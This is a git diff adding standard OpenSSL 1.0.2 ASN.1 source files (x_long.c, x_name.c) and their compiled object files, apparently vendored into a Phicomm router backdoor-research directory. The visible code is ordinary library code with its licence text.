+ * Custom primitive type for long handling. This converts between an
+ * ASN1_INTEGER and a long directly.
+ */
+
+static int long_new(ASN1_VALUE **pval, const ASN1_ITEM *it);
+static void long_free(ASN1_VALUE **pval, const ASN1_ITEM *it);
+
+static int long_i2c(ASN1_VALUE **pval, unsigned char *cont, int *putype,
+                    const ASN1_ITEM *it);
+static int long_c2i(ASN1_VALUE **pval, const unsigned char *cont, int len,
+                    int utype, char *free_cont, const ASN1_ITEM *it);
+static int long_print(BIO *out, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                      int indent, const ASN1_PCTX *pctx);
+
+static ASN1_PRIMITIVE_FUNCS long_pf = {
+    NULL, 0,
+    long_new,
+    long_free,
+    long_free,                  /* Clear should set to initial value */
+    long_c2i,
+    long_i2c,
+    long_print
+};
+
+ASN1_ITEM_start(LONG)
+        ASN1_ITYPE_PRIMITIVE, V_ASN1_INTEGER, NULL, 0, &long_pf, ASN1_LONG_UNDEF, "LONG"
+ASN1_ITEM_end(LONG)
+
+ASN1_ITEM_start(ZLONG)
+        ASN1_ITYPE_PRIMITIVE, V_ASN1_INTEGER, NULL, 0, &long_pf, 0, "ZLONG"
+ASN1_ITEM_end(ZLONG)
+
+static int long_new(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+        *(long *)pval = it->size;
+        return 1;
+}
+
+static void long_free(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+        *(long *)pval = it->size;
+}
+
+static int long_i2c(ASN1_VALUE **pval, unsigned char *cont, int *putype, const ASN1_ITEM *it)
+{
+        long ltmp;
+        unsigned long utmp;
+        int clen, pad, i;
+        /* this exists to bypass broken gcc optimization */
+        char *cp = (char *)pval;
+
+        /* use memcpy, because we may not be long aligned */
+        memcpy(&ltmp, cp, sizeof(long));
+
+        if(ltmp == it->size) return -1;
+        /* Convert the long to positive: we subtract one if negative so
+         * we can cleanly handle the padding if only the MSB of the leading
+         * octet is set.
+         */
+        if(ltmp < 0) utmp = -ltmp - 1;
+        else utmp = ltmp;
+        clen = BN_num_bits_word(utmp);
+        /* If MSB of leading octet set we need to pad */
+        if(!(clen & 0x7)) pad = 1;
+        else pad = 0;
+
+        /* Convert number of bits to number of octets */
+        clen = (clen + 7) >> 3;
+
+        if(cont) {
+                if(pad) *cont++ = (ltmp < 0) ? 0xff : 0;
+                for(i = clen - 1; i >= 0; i--) {
+                        cont[i] = (unsigned char)(utmp & 0xff);
+                        if(ltmp < 0) cont[i] ^= 0xff;
+                        utmp >>= 8;
+                }
+        }
+        return clen + pad;
+}
+
+static int long_c2i(ASN1_VALUE **pval, const unsigned char *cont, int len,
+                    int utype, char *free_cont, const ASN1_ITEM *it)
+{
+        int neg, i;
+        long ltmp;
+        unsigned long utmp = 0;
+        char *cp = (char *)pval;
+        if(len > (int)sizeof(long)) {
+                ASN1err(ASN1_F_LONG_C2I, ASN1_R_INTEGER_TOO_LARGE_FOR_LONG);
+                return 0;
+        }
+        /* Is it negative? */
+        if(len && (cont[0] & 0x80)) neg = 1;
+        else neg = 0;
+        utmp = 0;
+        for(i = 0; i < len; i++) {
+                utmp <<= 8;
+                if(neg) utmp |= cont[i] ^ 0xff;
+                else utmp |= cont[i];
+        }
+        ltmp = (long)utmp;
+        if(neg) {
+                ltmp++;
+                ltmp = -ltmp;
+        }
+        if(ltmp == it->size) {
+                ASN1err(ASN1_F_LONG_C2I, ASN1_R_INTEGER_TOO_LARGE_FOR_LONG);
+                return 0;
+        }
+        memcpy(cp, &ltmp, sizeof(long));
+        return 1;
+}
+
+static int long_print(BIO *out, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                        int indent, const ASN1_PCTX *pctx)
+        {
+        return BIO_printf(out, "%ld\n", *(long *)pval);
+        }
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_long.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_long.o
new file mode 100644
index 0000000000000000000000000000000000000000..4b55acb2385a435117730d62c3a06e499ddc4464
GIT binary patch
literal 3328
zcmbuBUrbwN6u`eyHoA!|s3RmO_C@WYyWz4KWe=_`6fWip3xh}|^HNF~Wc}ym)`3Pw
zf}J#T2@gK#i-|AB7hf0S!)#eJoBA;Oq)!t6#2I3uF*-9%>N)qGLoeUjIQ1l7&pE&E
zobP=1`v>P@`e2jCBUn7*DN*y73bE>|*<srZi+e=7_%+adOS>=_(uyq~VBQrMAiF~?
zX%`>IoFDNA10v&VSE~~z^b3#ZeesYrqZhx`ioa>)Kac4uSYO}3K=t?H=Gr$c;lLZ8
ztd&~Ie|WXRPx)rg&)bI!mAqds{-9Mq*2>jm;q_Ol7mru9M5Rz!+A4naOyRqmUj&9f
z)5_bvb^U<Qs-JFu|J<p_ls%udTfUX<;~%a<ftXrSuU&o@tdH)7AE#*P<Q274s94HC
z;PT#>T8WfzJUGx-S?P)fF12=O<t<;VP_p(wg-h48eOHI8o7-Ch#ZAcYYB#SB_eDb1
zJ3EW<P-=F+IH`}03<>)Osx*+M2K-L(Kjl}e)pK_`*1w7y>hC`q3{A}BGgdy>ryN##
z4yjM%ZC73C?NNG;9CWZVYBQ)dXnUXyjZ6rbcL|vn8p?f+5}udFglDPE)79GI+kk_G
zIrmdvJ85J+WVgE50NDpfhd@t~{W9u7f7|O#1OCqQ-iSZA*4&ixcSiheQ9qn<tp6&-
zzJU5^f7=vxG!Q)V&El78y>4&an}pxWU%NZY3nR(0A3&399RBuuiL=k&kNIAEb<wKH
z17PAfs8QT&gS^+l!d@S+RcOfHCvL9=*<P`iteQFsrbpD)DO~G<`P8@z1Ha4d?$}=8
z{+b;O@pw&lOVoDpG~F&<fvdM$hQP&hBg-iO_4s@PzTAMn2E5(1K2L&=vJMS-7#$Gi
zV#!ElGpCh=KxJf-XB}hCOeP&GXD(zc$6V;8ute_yb<PPz@9z=DkUkoX=*H;a;EC9{
zF&>HPF+)U$M-4lDPDDqHOg?SQELe-i*{nG$Vq;@QE^ir0)6AOA8)Yn5;-E7<yq7Rv
zA^w7g1LaxbctY{)F#p`eJ6v3GalBI;A0&?V#=V<-kCC@P;~kv_8%2)KIoReH&nJoZ
z5aaP1SUSmI&i5wRfQKZ`_rN_*9G~wE?<bGX_l(EKSoeI6(D=-GKAOaNoGFQOT|8GP
zJPyxOD2vN!D?S6-G95k7mYGb&6)U-931v2J#f37nxF{4eiw=gXiV7|U*#s=;R8rYQ
zJSB62iEKKZgj1?yvQ|=ocm2?!6;GTY|8yp=<jia?X<ExPKyu!gGvn!`Gx`7V8-!e3
zbNNLI14HS?PM1io=z=~x(_vQ(nr$@TH1Pmv%=MAa=jmbM@{9hwT!`{y{1}b-U-MO}
z&*y>42(HiffjQS_9ix1?{wf75aU$uU<cGnpw|==g>xW2QKYVwwlw6-LOBnjx5_CIY
zPeQ9#|2oy*pm^LrtS#411H<}!ufen>Oqcah2Bdl2SicCIZFlGy%6Bug<=FGU@coj*
za|D9W=N6tnv$w&(G3ERX0&j94X*vHb;PuvT8Ycz9`;Y5~?=|OlVkbzw+Q>t+p_4QZ
pJcsx{i=4j?*ll|cY?b~1@csd^MP5IAH|ynpN%Mb?@>t3Fe*+~^OhEtu

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_name.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_name.c
new file mode 100644
index 0000000..737c426
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_name.c
@@ -0,0 +1,527 @@
+/* crypto/asn1/x_name.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include "asn1_locl.h"
+
+typedef STACK_OF(X509_NAME_ENTRY) STACK_OF_X509_NAME_ENTRY;
+DECLARE_STACK_OF(STACK_OF_X509_NAME_ENTRY)
+
+static int x509_name_ex_d2i(ASN1_VALUE **val,
+                            const unsigned char **in, long len,
+                            const ASN1_ITEM *it,
+                            int tag, int aclass, char opt, ASN1_TLC *ctx);
+
+static int x509_name_ex_i2d(ASN1_VALUE **val, unsigned char **out,
+                            const ASN1_ITEM *it, int tag, int aclass);
+static int x509_name_ex_new(ASN1_VALUE **val, const ASN1_ITEM *it);
+static void x509_name_ex_free(ASN1_VALUE **val, const ASN1_ITEM *it);
+
+static int x509_name_encode(X509_NAME *a);
+static int x509_name_canon(X509_NAME *a);
+static int asn1_string_canon(ASN1_STRING *out, ASN1_STRING *in);
+static int i2d_name_canon(STACK_OF(STACK_OF_X509_NAME_ENTRY) * intname,
+                          unsigned char **in);
+
+static int x509_name_ex_print(BIO *out, ASN1_VALUE **pval,
+                              int indent,
+                              const char *fname, const ASN1_PCTX *pctx);
+
+ASN1_SEQUENCE(X509_NAME_ENTRY) = {
+        ASN1_SIMPLE(X509_NAME_ENTRY, object, ASN1_OBJECT),
+        ASN1_SIMPLE(X509_NAME_ENTRY, value, ASN1_PRINTABLE)
+} ASN1_SEQUENCE_END(X509_NAME_ENTRY)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_NAME_ENTRY)
+IMPLEMENT_ASN1_DUP_FUNCTION(X509_NAME_ENTRY)
+
+/*
+ * For the "Name" type we need a SEQUENCE OF { SET OF X509_NAME_ENTRY } so
+ * declare two template wrappers for this
+ */
+
+ASN1_ITEM_TEMPLATE(X509_NAME_ENTRIES) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SET_OF, 0, RDNS, X509_NAME_ENTRY)
+ASN1_ITEM_TEMPLATE_END(X509_NAME_ENTRIES)
+
+ASN1_ITEM_TEMPLATE(X509_NAME_INTERNAL) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, Name, X509_NAME_ENTRIES)
+ASN1_ITEM_TEMPLATE_END(X509_NAME_INTERNAL)
+
+/*
+ * Normally that's where it would end: we'd have two nested STACK structures
+ * representing the ASN1. Unfortunately X509_NAME uses a completely different
+ * form and caches encodings so we have to process the internal form and
+ * convert to the external form.
+ */
+
+const ASN1_EXTERN_FUNCS x509_name_ff = {
+    NULL,
+    x509_name_ex_new,
+    x509_name_ex_free,
+    0,                          /* Default clear behaviour is OK */
+    x509_name_ex_d2i,
+    x509_name_ex_i2d,
+    x509_name_ex_print
+};
+
+IMPLEMENT_EXTERN_ASN1(X509_NAME, V_ASN1_SEQUENCE, x509_name_ff)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_NAME)
+
+IMPLEMENT_ASN1_DUP_FUNCTION(X509_NAME)
+
+static int x509_name_ex_new(ASN1_VALUE **val, const ASN1_ITEM *it)
+{
+    X509_NAME *ret = NULL;
+    ret = OPENSSL_malloc(sizeof(X509_NAME));
+    if (!ret)
+        goto memerr;
+    if ((ret->entries = sk_X509_NAME_ENTRY_new_null()) == NULL)
+        goto memerr;
+    if ((ret->bytes = BUF_MEM_new()) == NULL)
+        goto memerr;
+    ret->canon_enc = NULL;
+    ret->canon_enclen = 0;
+    ret->modified = 1;
+    *val = (ASN1_VALUE *)ret;
+    return 1;
+
+ memerr:
+    ASN1err(ASN1_F_X509_NAME_EX_NEW, ERR_R_MALLOC_FAILURE);
+    if (ret) {
+        if (ret->entries)
+            sk_X509_NAME_ENTRY_free(ret->entries);
+        OPENSSL_free(ret);
+    }
+    return 0;
+}
+
+static void x509_name_ex_free(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    X509_NAME *a;
+    if (!pval || !*pval)
+        return;
+    a = (X509_NAME *)*pval;
+
+    BUF_MEM_free(a->bytes);
+    sk_X509_NAME_ENTRY_pop_free(a->entries, X509_NAME_ENTRY_free);
+    if (a->canon_enc)
+        OPENSSL_free(a->canon_enc);
+    OPENSSL_free(a);
+    *pval = NULL;
+}
+
+static int x509_name_ex_d2i(ASN1_VALUE **val,
+                            const unsigned char **in, long len,
+                            const ASN1_ITEM *it, int tag, int aclass,
+                            char opt, ASN1_TLC *ctx)
+{
+    const unsigned char *p = *in, *q;
+    union {
+        STACK_OF(STACK_OF_X509_NAME_ENTRY) *s;
+        ASN1_VALUE *a;
+    } intname = {
+        NULL
+    };
+    union {
+        X509_NAME *x;
+        ASN1_VALUE *a;
+    } nm = {
+        NULL
+    };
+    int i, j, ret;
+    STACK_OF(X509_NAME_ENTRY) *entries;
+    X509_NAME_ENTRY *entry;
+    q = p;
+
+    /* Get internal representation of Name */
+    ret = ASN1_item_ex_d2i(&intname.a,
+                           &p, len, ASN1_ITEM_rptr(X509_NAME_INTERNAL),
+                           tag, aclass, opt, ctx);
+
+    if (ret <= 0)
+        return ret;
+
+    if (*val)
+        x509_name_ex_free(val, NULL);
+    if (!x509_name_ex_new(&nm.a, NULL))
+        goto err;
+    /* We've decoded it: now cache encoding */
+    if (!BUF_MEM_grow(nm.x->bytes, p - q))
+        goto err;
+    memcpy(nm.x->bytes->data, q, p - q);
+
+    /* Convert internal representation to X509_NAME structure */
+    for (i = 0; i < sk_STACK_OF_X509_NAME_ENTRY_num(intname.s); i++) {
+        entries = sk_STACK_OF_X509_NAME_ENTRY_value(intname.s, i);
+        for (j = 0; j < sk_X509_NAME_ENTRY_num(entries); j++) {
+            entry = sk_X509_NAME_ENTRY_value(entries, j);
+            entry->set = i;
+            if (!sk_X509_NAME_ENTRY_push(nm.x->entries, entry))
+                goto err;
+        }
+        sk_X509_NAME_ENTRY_free(entries);
+    }
+    sk_STACK_OF_X509_NAME_ENTRY_free(intname.s);
+    ret = x509_name_canon(nm.x);
+    if (!ret)
+        goto err;
+    nm.x->modified = 0;
+    *val = nm.a;
+    *in = p;
+    return ret;
+ err:
+    if (nm.x != NULL)
+        X509_NAME_free(nm.x);
+    ASN1err(ASN1_F_X509_NAME_EX_D2I, ERR_R_NESTED_ASN1_ERROR);
+    return 0;
+}
+
+static int x509_name_ex_i2d(ASN1_VALUE **val, unsigned char **out,
+                            const ASN1_ITEM *it, int tag, int aclass)
+{
+    int ret;
+    X509_NAME *a = (X509_NAME *)*val;
+    if (a->modified) {
+        ret = x509_name_encode(a);
+        if (ret < 0)
+            return ret;
+        ret = x509_name_canon(a);
+        if (ret < 0)
+            return ret;
+    }
+    ret = a->bytes->length;
+    if (out != NULL) {
+        memcpy(*out, a->bytes->data, ret);
+        *out += ret;
+    }
+    return ret;
+}
+
+static void local_sk_X509_NAME_ENTRY_free(STACK_OF(X509_NAME_ENTRY) *ne)
+{
+    sk_X509_NAME_ENTRY_free(ne);
+}
+
+static void local_sk_X509_NAME_ENTRY_pop_free(STACK_OF(X509_NAME_ENTRY) *ne)
+{
+    sk_X509_NAME_ENTRY_pop_free(ne, X509_NAME_ENTRY_free);
+}
+
+static int x509_name_encode(X509_NAME *a)
+{
+    union {
+        STACK_OF(STACK_OF_X509_NAME_ENTRY) *s;
+        ASN1_VALUE *a;
+    } intname = {
+        NULL
+    };
+    int len;
+    unsigned char *p;
+    STACK_OF(X509_NAME_ENTRY) *entries = NULL;
+    X509_NAME_ENTRY *entry;
+    int i, set = -1;
+    intname.s = sk_STACK_OF_X509_NAME_ENTRY_new_null();
+    if (!intname.s)
+        goto memerr;
+    for (i = 0; i < sk_X509_NAME_ENTRY_num(a->entries); i++) {
+        entry = sk_X509_NAME_ENTRY_value(a->entries, i);
+        if (entry->set != set) {
+            entries = sk_X509_NAME_ENTRY_new_null();
+            if (!entries)
+                goto memerr;
+            if (!sk_STACK_OF_X509_NAME_ENTRY_push(intname.s, entries))
+                goto memerr;
+            set = entry->set;
+        }
+        if (!sk_X509_NAME_ENTRY_push(entries, entry))
+            goto memerr;
+    }
+    len = ASN1_item_ex_i2d(&intname.a, NULL,
+                           ASN1_ITEM_rptr(X509_NAME_INTERNAL), -1, -1);
+    if (!BUF_MEM_grow(a->bytes, len))
+        goto memerr;
+    p = (unsigned char *)a->bytes->data;
+    ASN1_item_ex_i2d(&intname.a,
+                     &p, ASN1_ITEM_rptr(X509_NAME_INTERNAL), -1, -1);
+    sk_STACK_OF_X509_NAME_ENTRY_pop_free(intname.s,
+                                         local_sk_X509_NAME_ENTRY_free);
+    a->modified = 0;
+    return len;
+ memerr:
+    sk_STACK_OF_X509_NAME_ENTRY_pop_free(intname.s,
+                                         local_sk_X509_NAME_ENTRY_free);
+    ASN1err(ASN1_F_X509_NAME_ENCODE, ERR_R_MALLOC_FAILURE);
+    return -1;
+}
+
+static int x509_name_ex_print(BIO *out, ASN1_VALUE **pval,
+                              int indent,
+                              const char *fname, const ASN1_PCTX *pctx)
+{
+    if (X509_NAME_print_ex(out, (X509_NAME *)*pval,
+                           indent, pctx->nm_flags) <= 0)
+        return 0;
+    return 2;
+}
+
+/*
+ * This function generates the canonical encoding of the Name structure. In
+ * it all strings are converted to UTF8, leading, trailing and multiple
+ * spaces collapsed, converted to lower case and the leading SEQUENCE header
+ * removed. In future we could also normalize the UTF8 too. By doing this
+ * comparison of Name structures can be rapidly perfomed by just using
+ * memcmp() of the canonical encoding. By omitting the leading SEQUENCE name
+ * constraints of type dirName can also be checked with a simple memcmp().
+ */
+
+static int x509_name_canon(X509_NAME *a)
+{
+    unsigned char *p;
+    STACK_OF(STACK_OF_X509_NAME_ENTRY) *intname = NULL;
+    STACK_OF(X509_NAME_ENTRY) *entries = NULL;
+    X509_NAME_ENTRY *entry, *tmpentry = NULL;
+    int i, set = -1, ret = 0;
+
+    if (a->canon_enc) {
+        OPENSSL_free(a->canon_enc);
+        a->canon_enc = NULL;
+    }
+    /* Special case: empty X509_NAME => null encoding */
+    if (sk_X509_NAME_ENTRY_num(a->entries) == 0) {
+        a->canon_enclen = 0;
+        return 1;
+    }
+    intname = sk_STACK_OF_X509_NAME_ENTRY_new_null();
+    if (!intname)
+        goto err;
+    for (i = 0; i < sk_X509_NAME_ENTRY_num(a->entries); i++) {
+        entry = sk_X509_NAME_ENTRY_value(a->entries, i);
+        if (entry->set != set) {
+            entries = sk_X509_NAME_ENTRY_new_null();
+            if (!entries)
+                goto err;
+            if (!sk_STACK_OF_X509_NAME_ENTRY_push(intname, entries))
+                goto err;
+            set = entry->set;
+        }
+        tmpentry = X509_NAME_ENTRY_new();
+        if (!tmpentry)
+            goto err;
+        tmpentry->object = OBJ_dup(entry->object);
+        if (!asn1_string_canon(tmpentry->value, entry->value))
+            goto err;
+        if (!sk_X509_NAME_ENTRY_push(entries, tmpentry))
+            goto err;
+        tmpentry = NULL;
+    }
+
+    /* Finally generate encoding */
+
+    a->canon_enclen = i2d_name_canon(intname, NULL);
+
+    p = OPENSSL_malloc(a->canon_enclen);
+
+    if (!p)
+        goto err;
+
+    a->canon_enc = p;
+
+    i2d_name_canon(intname, &p);
+
+    ret = 1;
+
+ err:
+
+    if (tmpentry)
+        X509_NAME_ENTRY_free(tmpentry);
+    if (intname)
+        sk_STACK_OF_X509_NAME_ENTRY_pop_free(intname,
+                                             local_sk_X509_NAME_ENTRY_pop_free);
+    return ret;
+}
+
+/* Bitmap of all the types of string that will be canonicalized. */
+
+#define ASN1_MASK_CANON \
+        (B_ASN1_UTF8STRING | B_ASN1_BMPSTRING | B_ASN1_UNIVERSALSTRING \
+        | B_ASN1_PRINTABLESTRING | B_ASN1_T61STRING | B_ASN1_IA5STRING \
+        | B_ASN1_VISIBLESTRING)
+
+static int asn1_string_canon(ASN1_STRING *out, ASN1_STRING *in)
+{
+    unsigned char *to, *from;
+    int len, i;
+
+    /* If type not in bitmask just copy string across */
+    if (!(ASN1_tag2bit(in->type) & ASN1_MASK_CANON)) {
+        if (!ASN1_STRING_copy(out, in))
+            return 0;
+        return 1;
+    }
+
+    out->type = V_ASN1_UTF8STRING;
+    out->length = ASN1_STRING_to_UTF8(&out->data, in);
+    if (out->length == -1)
+        return 0;
+
+    to = out->data;
+    from = to;
+
+    len = out->length;
+
+    /*
+     * Convert string in place to canonical form. Ultimately we may need to
+     * handle a wider range of characters but for now ignore anything with
+     * MSB set and rely on the isspace() and tolower() functions.
+     */
+
+    /* Ignore leading spaces */
+    while ((len > 0) && !(*from & 0x80) && isspace(*from)) {
+        from++;
+        len--;
+    }
+
+    to = from + len - 1;
+
+    /* Ignore trailing spaces */
+    while ((len > 0) && !(*to & 0x80) && isspace(*to)) {
+        to--;
+        len--;
+    }
+
+    to = out->data;
+
+    i = 0;
+    while (i < len) {
+        /* If MSB set just copy across */
+        if (*from & 0x80) {
+            *to++ = *from++;
+            i++;
+        }
+        /* Collapse multiple spaces */
+        else if (isspace(*from)) {
+            /* Copy one space across */
+            *to++ = ' ';
+            /*
+             * Ignore subsequent spaces. Note: don't need to check len here
+             * because we know the last character is a non-space so we can't
+             * overflow.
+             */
+            do {
+                from++;
+                i++;
+            }
+            while (!(*from & 0x80) && isspace(*from));
+        } else {
+            *to++ = tolower(*from);
+            from++;
+            i++;
+        }
+    }
+
+    out->length = to - out->data;
+
+    return 1;
+
+}
+
+static int i2d_name_canon(STACK_OF(STACK_OF_X509_NAME_ENTRY) * _intname,
+                          unsigned char **in)
+{
+    int i, len, ltmp;
+    ASN1_VALUE *v;
+    STACK_OF(ASN1_VALUE) *intname = (STACK_OF(ASN1_VALUE) *)_intname;
+
+    len = 0;
+    for (i = 0; i < sk_ASN1_VALUE_num(intname); i++) {
+        v = sk_ASN1_VALUE_value(intname, i);
+        ltmp = ASN1_item_ex_i2d(&v, in,
+                                ASN1_ITEM_rptr(X509_NAME_ENTRIES), -1, -1);
+        if (ltmp < 0)
+            return ltmp;
+        len += ltmp;
+    }
+    return len;
+}
+
+int X509_NAME_set(X509_NAME **xn, X509_NAME *name)
+{
+    X509_NAME *in;
+
+    if (!xn || !name)
+        return (0);
+
+    if (*xn != name) {
+        in = X509_NAME_dup(name);
+        if (in != NULL) {
+            X509_NAME_free(*xn);
+            *xn = in;
+        }
+    }
+    return (*xn != NULL);
+}
+
+IMPLEMENT_STACK_OF(X509_NAME_ENTRY)
+
+IMPLEMENT_ASN1_SET_OF(X509_NAME_ENTRY)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_name.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_name.o
new file mode 100644
index 0000000000000000000000000000000000000000..fc60910670fb214c9970523ad22ee777b02828ba
GIT binary patch
literal 10824
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
